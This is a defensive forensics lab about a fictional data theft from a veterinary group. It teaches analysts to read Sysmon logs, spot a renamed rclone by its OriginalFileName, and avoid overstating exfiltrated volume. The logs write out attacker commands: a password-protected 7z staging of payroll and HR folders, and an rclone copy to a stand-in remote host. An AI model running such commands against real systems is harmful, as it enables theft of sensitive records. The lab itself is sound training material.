Guided lab: the svchost that lived in Public

Data staged with an archiver and sent out with a renamed copy of a legitimate sync tool. Identify the binary from one field, reconstruct what was taken from a command line, and be exact about what endpoint telemetry cannot tell you about volume.

The call

2026-09-15, evening. Wrenfield Veterinary Group has been told by an outside party that some of its files are being offered for sale. Nothing is encrypted. You are given Sysmon logs from WREN-FS-03 and asked a simple question: what left, and when?

Artifact 1: staging

01:12:30  Event ID 1  Process Create
  Image:             C:\ProgramData\7z.exe
  OriginalFileName:  7z.exe
  CommandLine:       7z.exe a -mx1 -p C:\ProgramData\fin.7z D:\Shares\Finance\Payroll D:\Shares\Finance\Contracts D:\Shares\HR\Leavers
  User:              WRENFIELD\adm.rourke

01:19:04  Event ID 11  FileCreate
  Image:             C:\ProgramData\7z.exe
  TargetFilename:    C:\ProgramData\fin.7z

Q1

Without opening the archive, which you may never recover, what can you say was taken? How confident are you, and what in the command line lowers your confidence in anything you find later?

Stuck? Where to look

The command line is a list. One of the switches is about secrecy.

Show the answer

Three directories: Payroll, Contracts and HR Leavers. The command line names its inputs, and that list is the best inventory you will get. It is an observation of what was selected, which is enough to start a notification assessment.

-p sets a password and -mx1 is the fastest compression level. The operator wanted it quick and wanted the contents unreadable to anybody inspecting it in transit or finding it afterwards. If you recover fin.7z you will not be able to open it, so the command line is your evidence, not the file. Preserve the log.

Seven minutes between process start and the file event gives a rough sense of size, and only rough.

Artifact 2: the transfer

01:21:47  Event ID 1  Process Create
  Image:             C:\Users\Public\svchost.exe
  OriginalFileName:  rclone.exe
  CommandLine:       svchost.exe copy C:\ProgramData\fin.7z remote:archive-5448 --transfers 8 --config C:\Users\Public\r.conf
  ParentImage:       C:\Windows\System32\cmd.exe
  User:              WRENFIELD\adm.rourke

01:21:48  Event ID 22  DNSEvent
  Image:             C:\Users\Public\svchost.exe
  QueryName:         storage.cdn-greyline.example

01:21:49  Event ID 3  NetworkConnect
  Image:             C:\Users\Public\svchost.exe
  DestinationIp:     203.0.113.162
  DestinationPort:   443
  Initiated:         true

Q2

List every reason this is not the real svchost.exe. Which one would survive the operator being more careful about the path and the parent?

Stuck? Where to look

Some of these are about where the file is and how it was started. One is about what the file is.

Show the answer
  • Path. The real one lives in System32. Nothing legitimate runs from C:\Users\Public.
  • Parent. The real one is started by services.exe, never by cmd.exe.
  • Command line. The real one always carries -k and a service group.
  • User. The real one runs as SYSTEM, LOCAL SERVICE or NETWORK SERVICE, not as an administrator's account.
  • OriginalFileName: rclone.exe.

The last is the durable one. Sysmon reads it from the version resource compiled into the executable, so renaming the file does not change it. An operator who fixes the path, the parent and the arguments still has to patch the binary to change this field, and most do not. A rule on OriginalFileName disagreeing with Image finds renamed tools of every kind.

Q3

The board asks how much data left. Answer from this evidence, precisely.

Stuck? Where to look

Look for a byte count in any of the six events.

Show the answer

This evidence cannot say. Sysmon event 3 records that a connection was opened. It records no byte counts and no duration. You can state that a transfer tool was pointed at a 7z file and connected out on port 443 at 01:21:49. You cannot state that it finished, or how much it sent.

The number lives elsewhere: firewall or proxy logs for the session to 203.0.113.162, NetFlow, or the cloud provider's own logs if the bucket can be identified. If none of those exist, the honest answer to the board is the upper bound: the full contents of the three directories, stated as an assumption.

Resist the pull to estimate from the seven-minute compression time. It produces a number, the number will be repeated, and it rests on nothing.

Q4

One file named in the command line is more valuable to you than the archive. Which, and what do you do about it tonight?

Stuck? Where to look

The tool had to be told where to send the data and how to authenticate.

Show the answer

C:\Users\Public\r.conf, the tool's configuration file. It names the storage provider and holds the credentials or keys for the remote called remote. That identifies the destination account, which is what a provider's abuse team or a court order needs, and occasionally it is enough to show what is in the bucket.

Tonight: check whether it still exists, and if it does, collect it forensically with its timestamps and hash it. If it has been deleted, the USN journal will show when, and the content may be recoverable from unallocated space for a while. Do not use the credentials yourself. Accessing the operator's storage is a legal decision, not a technical one, and it belongs to counsel.

What to do with it

Observed: three named directories archived with a password at 01:12:00, and a renamed rclone started against the archive at 01:21:00 with an outbound connection to 203.0.113.162. Assessed, with high confidence: exfiltration of those directories. Unknown: volume, completion, and how adm.rourke's account came to be doing this at one in the morning.

Treat this as the first half of a ransomware operation until shown otherwise. The ransomware response plan covers why theft now usually precedes encryption, and the network rule pack has the proxy rules that see a sync tool's user agent.

Argue underneath

Blocking rclone by hash is trivial and useless. Blocking it by OriginalFileName is better and still bypassable. Blocking unknown cloud storage at the proxy breaks things people rely on. Which do you do, and what do you tell the person whose legitimate sync job you just broke?

Sources

The scenario above is invented. These are what its real half rests on.

Corrections and additions are welcome: this is a working document. Get in touch, or post a case of your own in the community.

Discussion

Guidelines

Sign in to comment. Corrections and additions are the point: this is a working document.